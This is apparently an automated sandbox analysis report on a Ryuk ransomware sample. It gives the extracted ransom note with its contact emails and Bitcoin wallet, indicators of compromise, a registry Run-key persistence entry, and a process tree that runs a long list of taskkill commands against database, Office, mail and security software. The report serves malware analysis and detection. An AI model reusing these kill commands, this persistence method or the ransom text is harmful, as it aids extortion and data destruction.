Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
146s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
17/04/2021, 13:15
Static task
static1
Behavioral task
behavioral1
Sample
dll64.dll
Resource
win7v20210410
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
dll64.dll
Resource
win10v20210408
0 signatures
0 seconds
Behavioral task
behavioral3
Sample
eiavW.exe
Resource
win7v20210410
0 signatures
0 seconds
Behavioral task
behavioral4
Sample
eiavW.exe
Resource
win10v20210410
0 signatures
0 seconds
General
-
Target
eiavW.exe
Score
10/10
Malware Config
Extracted
Path
C:\RyukReadMe.txt
Family
ryuk
Ransom Note
Gentlemen!
Your business is at serious risk.
There is a significant hole in the security system of your company.
We've easily penetrated your network.
You should thank the Lord for being hacked by serious people not some stupid schoolboys or dangerous punks.
They can damage all your important data just for fun.
Now your files are crypted with the strongest millitary algorithms RSA4096 and AES-256.
No one can help you to restore files without our special decoder.
Photorec, RannohDecryptor etc. repair tools
are useless and can destroy your files irreversibly.
If you want to restore your files write to emails (contacts are at the bottom of the sheet)
and attach 2-3 encrypted files
(Less than 5 Mb each, non-archived and your files should not contain valuable information
(Databases, backups, large excel sheets, etc.)).
You will receive decrypted samples and our conditions how to get the decoder.
Please don't forget to write the name of your company in the subject of your e-mail.
You have to pay for decryption in Bitcoins.
The final price depends on how fast you write to us.
Every day of delay will cost you additional +0.5 BTC
Nothing personal just business
As soon as we get bitcoins you'll get all your decrypted data back.
Moreover you will get instructions how to close the hole in security
and how to avoid such problems in the future
+ we will recommend you special software that makes the most problems to hackers.
Attention! One more time !
Do not rename encrypted files.
Do not try to decrypt your data using third party software.
P.S. Remember, we are not scammers.
We don`t need your files and your information.
But after 2 weeks all your files and keys will be deleted automatically.
Just send a request immediately after infection.
All data will be restored absolutely.
Your warranty - decrypted samples.
contact emails
[email protected]
or
[email protected]
BTC wallet:
15RLWdVnY5n1n7mTvU1zjg67wt86dhYqNj
Ryuk
No system is safe
Wallets
15RLWdVnY5n1n7mTvU1zjg67wt86dhYqNj
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\SearchInstall.tiff sihost.exe File opened for modification C:\Users\Admin\Pictures\BlockComplete.tiff sihost.exe -
Drops startup file 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\RyukReadMe.txt sihost.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos = "C:\\Users\\Admin\\AppData\\Local\\Temp\\eiavW.exe" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\css\main.css sihost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\eu-es\ui-strings.js sihost.exe File opened for modification C:\Program Files\Common Files\DESIGNER\RyukReadMe.txt sihost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg sihost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.properties sihost.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\MTEXTRA.TTF sihost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\organize.svg sihost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\RyukReadMe.txt sihost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\sl-si\RyukReadMe.txt sihost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\it-it\RyukReadMe.txt sihost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\scanAppLogo.png sihost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\Xusage.txt sihost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaTypewriterBold.ttf sihost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-pl.xrm-ms sihost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest5-pl.xrm-ms sihost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Grace-ul-oob.xrm-ms sihost.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\manifest.xml sihost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdR_Retail-ul-phn.xrm-ms sihost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\RyukReadMe.txt sihost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\WelcomeCardRdr.png sihost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ca-es\RyukReadMe.txt sihost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.expressions_3.4.600.v20140128-0851.jar sihost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Retail-ppd.xrm-ms sihost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription5-pl.xrm-ms sihost.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogoSmall.contrast-white_scale-100.png sihost.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] sihost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\RyukReadMe.txt sihost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar sihost.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\RyukReadMe.txt sihost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons__retina_hiContrast_wob.png sihost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\license.html sihost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-io_zh_CN.jar sihost.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG_COL.HXC sihost.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-100.png sihost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\da-dk\RyukReadMe.txt sihost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp-ul-oob.xrm-ms sihost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\versions\RyukReadMe.txt sihost.exe File opened for modification C:\Program Files (x86)\Common Files\System\RyukReadMe.txt sihost.exe File opened for modification C:\Program Files\Common Files\microsoft shared\Stationery\Green Bubbles.htm sihost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\RyukReadMe.txt sihost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\MANIFEST.MF sihost.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\icecast.luac sihost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\pt-br\ui-strings.js sihost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial3-ppd.xrm-ms sihost.exe File opened for modification C:\Program Files\RevokePublish.aiff sihost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files-select\css\RyukReadMe.txt sihost.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ar-SA\RyukReadMe.txt sihost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_ja.jar sihost.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Grayscale.xml sihost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_Retail-pl.xrm-ms sihost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hr-hr\RyukReadMe.txt sihost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription4-ppd.xrm-ms sihost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hu-hu\RyukReadMe.txt sihost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\RyukReadMe.txt sihost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\close.svg sihost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp2-ppd.xrm-ms sihost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365BusinessR_SubTrial-ul-oob.xrm-ms sihost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-57x57-precomposed.png sihost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\RyukReadMe.txt sihost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\root\RyukReadMe.txt sihost.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_ja_4.4.0.v20140623020002.jar sihost.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription5-ul-oob.xrm-ms sihost.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\jquery.jstree.js sihost.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\AddressBook2x.png sihost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 7936 3820 WerFault.exe 49 -
Kills process with taskkill 44 IoCs
pid Process 3764 taskkill.exe 4356 taskkill.exe 4984 taskkill.exe 5180 taskkill.exe 5372 taskkill.exe 200 taskkill.exe 3788 taskkill.exe 1172 taskkill.exe 4624 taskkill.exe 5764 taskkill.exe 5908 taskkill.exe 2272 taskkill.exe 740 taskkill.exe 4972 taskkill.exe 5564 taskkill.exe 2932 taskkill.exe 1068 taskkill.exe 4216 taskkill.exe 4488 taskkill.exe 4756 taskkill.exe 4876 taskkill.exe 5088 taskkill.exe 4104 taskkill.exe 4556 taskkill.exe 5240 taskkill.exe 2696 taskkill.exe 4168 taskkill.exe 4548 taskkill.exe 4936 taskkill.exe 5496 taskkill.exe 5820 taskkill.exe 5972 taskkill.exe 1128 taskkill.exe 4292 taskkill.exe 4412 taskkill.exe 5308 taskkill.exe 5440 taskkill.exe 5628 taskkill.exe 5680 taskkill.exe 6016 taskkill.exe 4076 taskkill.exe 4700 taskkill.exe 4812 taskkill.exe 5124 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 29 IoCs
pid Process 3680 eiavW.exe 3680 eiavW.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe 7936 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3680 eiavW.exe -
Suspicious use of AdjustPrivilegeToken 46 IoCs
description pid Process Token: SeDebugPrivilege 2272 taskkill.exe Token: SeDebugPrivilege 200 taskkill.exe Token: SeDebugPrivilege 1128 taskkill.exe Token: SeDebugPrivilege 2932 taskkill.exe Token: SeDebugPrivilege 2696 taskkill.exe Token: SeDebugPrivilege 4076 taskkill.exe Token: SeDebugPrivilege 3788 taskkill.exe Token: SeDebugPrivilege 3764 taskkill.exe Token: SeDebugPrivilege 1068 taskkill.exe Token: SeDebugPrivilege 1172 taskkill.exe Token: SeDebugPrivilege 740 taskkill.exe Token: SeDebugPrivilege 4168 taskkill.exe Token: SeDebugPrivilege 4216 taskkill.exe Token: SeDebugPrivilege 4292 taskkill.exe Token: SeDebugPrivilege 4412 taskkill.exe Token: SeDebugPrivilege 4356 taskkill.exe Token: SeDebugPrivilege 4488 taskkill.exe Token: SeDebugPrivilege 4548 taskkill.exe Token: SeDebugPrivilege 4624 taskkill.exe Token: SeDebugPrivilege 4756 taskkill.exe Token: SeDebugPrivilege 4700 taskkill.exe Token: SeDebugPrivilege 4812 taskkill.exe Token: SeDebugPrivilege 4876 taskkill.exe Token: SeDebugPrivilege 4936 taskkill.exe Token: SeDebugPrivilege 4984 taskkill.exe Token: SeDebugPrivilege 5088 taskkill.exe Token: SeDebugPrivilege 4104 taskkill.exe Token: SeDebugPrivilege 4556 taskkill.exe Token: SeDebugPrivilege 4972 taskkill.exe Token: SeDebugPrivilege 5124 taskkill.exe Token: SeDebugPrivilege 5180 taskkill.exe Token: SeDebugPrivilege 5240 taskkill.exe Token: SeDebugPrivilege 5308 taskkill.exe Token: SeDebugPrivilege 5440 taskkill.exe Token: SeDebugPrivilege 5372 taskkill.exe Token: SeDebugPrivilege 5496 taskkill.exe Token: SeDebugPrivilege 5564 taskkill.exe Token: SeDebugPrivilege 5628 taskkill.exe Token: SeDebugPrivilege 5680 taskkill.exe Token: SeDebugPrivilege 5764 taskkill.exe Token: SeDebugPrivilege 5820 taskkill.exe Token: SeDebugPrivilege 5908 taskkill.exe Token: SeDebugPrivilege 6016 taskkill.exe Token: SeDebugPrivilege 5972 taskkill.exe Token: SeDebugPrivilege 3680 eiavW.exe Token: SeDebugPrivilege 7936 WerFault.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3680 wrote to memory of 200 3680 eiavW.exe 78 PID 3680 wrote to memory of 200 3680 eiavW.exe 78 PID 3680 wrote to memory of 2272 3680 eiavW.exe 80 PID 3680 wrote to memory of 2272 3680 eiavW.exe 80 PID 3680 wrote to memory of 2932 3680 eiavW.exe 82 PID 3680 wrote to memory of 2932 3680 eiavW.exe 82 PID 3680 wrote to memory of 1128 3680 eiavW.exe 83 PID 3680 wrote to memory of 1128 3680 eiavW.exe 83 PID 3680 wrote to memory of 2696 3680 eiavW.exe 85 PID 3680 wrote to memory of 2696 3680 eiavW.exe 85 PID 3680 wrote to memory of 4076 3680 eiavW.exe 88 PID 3680 wrote to memory of 4076 3680 eiavW.exe 88 PID 3680 wrote to memory of 3788 3680 eiavW.exe 89 PID 3680 wrote to memory of 3788 3680 eiavW.exe 89 PID 3680 wrote to memory of 1068 3680 eiavW.exe 91 PID 3680 wrote to memory of 1068 3680 eiavW.exe 91 PID 3680 wrote to memory of 3764 3680 eiavW.exe 92 PID 3680 wrote to memory of 3764 3680 eiavW.exe 92 PID 3680 wrote to memory of 1172 3680 eiavW.exe 94 PID 3680 wrote to memory of 1172 3680 eiavW.exe 94 PID 3680 wrote to memory of 740 3680 eiavW.exe 96 PID 3680 wrote to memory of 740 3680 eiavW.exe 96 PID 3680 wrote to memory of 4168 3680 eiavW.exe 98 PID 3680 wrote to memory of 4168 3680 eiavW.exe 98 PID 3680 wrote to memory of 4216 3680 eiavW.exe 100 PID 3680 wrote to memory of 4216 3680 eiavW.exe 100 PID 3680 wrote to memory of 4292 3680 eiavW.exe 102 PID 3680 wrote to memory of 4292 3680 eiavW.exe 102 PID 3680 wrote to memory of 4356 3680 eiavW.exe 104 PID 3680 wrote to memory of 4356 3680 eiavW.exe 104 PID 3680 wrote to memory of 4412 3680 eiavW.exe 106 PID 3680 wrote to memory of 4412 3680 eiavW.exe 106 PID 3680 wrote to memory of 4488 3680 eiavW.exe 108 PID 3680 wrote to memory of 4488 3680 eiavW.exe 108 PID 3680 wrote to memory of 4548 3680 eiavW.exe 111 PID 3680 wrote to memory of 4548 3680 eiavW.exe 111 PID 3680 wrote to memory of 4624 3680 eiavW.exe 112 PID 3680 wrote to memory of 4624 3680 eiavW.exe 112 PID 3680 wrote to memory of 4700 3680 eiavW.exe 116 PID 3680 wrote to memory of 4700 3680 eiavW.exe 116 PID 3680 wrote to memory of 4756 3680 eiavW.exe 118 PID 3680 wrote to memory of 4756 3680 eiavW.exe 118 PID 3680 wrote to memory of 4812 3680 eiavW.exe 119 PID 3680 wrote to memory of 4812 3680 eiavW.exe 119 PID 3680 wrote to memory of 4876 3680 eiavW.exe 121 PID 3680 wrote to memory of 4876 3680 eiavW.exe 121 PID 3680 wrote to memory of 4936 3680 eiavW.exe 123 PID 3680 wrote to memory of 4936 3680 eiavW.exe 123 PID 3680 wrote to memory of 4984 3680 eiavW.exe 125 PID 3680 wrote to memory of 4984 3680 eiavW.exe 125 PID 3680 wrote to memory of 5088 3680 eiavW.exe 127 PID 3680 wrote to memory of 5088 3680 eiavW.exe 127 PID 3680 wrote to memory of 4104 3680 eiavW.exe 130 PID 3680 wrote to memory of 4104 3680 eiavW.exe 130 PID 3680 wrote to memory of 4556 3680 eiavW.exe 132 PID 3680 wrote to memory of 4556 3680 eiavW.exe 132 PID 3680 wrote to memory of 4972 3680 eiavW.exe 134 PID 3680 wrote to memory of 4972 3680 eiavW.exe 134 PID 3680 wrote to memory of 5124 3680 eiavW.exe 135 PID 3680 wrote to memory of 5124 3680 eiavW.exe 135 PID 3680 wrote to memory of 5180 3680 eiavW.exe 137 PID 3680 wrote to memory of 5180 3680 eiavW.exe 137 PID 3680 wrote to memory of 5240 3680 eiavW.exe 138 PID 3680 wrote to memory of 5240 3680 eiavW.exe 138
Processes
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵PID:3244
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3820
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3820 -s 8482⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7936
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3580
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵PID:3256
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵PID:2712
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵PID:2480
-
c:\windows\system32\sihost.exesihost.exe1⤵
- Modifies extensions of user files
- Drops startup file
- Drops file in Program Files directory
PID:2432
-
C:\Users\Admin\AppData\Local\Temp\eiavW.exe"C:\Users\Admin\AppData\Local\Temp\eiavW.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:200
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2272
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1128
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2696
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4076
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3788
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3764
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1172
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:740
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4168
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4216
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4292
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4356
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4412
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4488
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4548
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4624
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4700
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4756
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4812
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4876
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4936
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4984
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5088
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4104
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4556
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5124
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5180
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5240
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5308
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5372
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM thunderbird.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5440
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5496
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5564
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5628
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5680
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5764
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5820
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
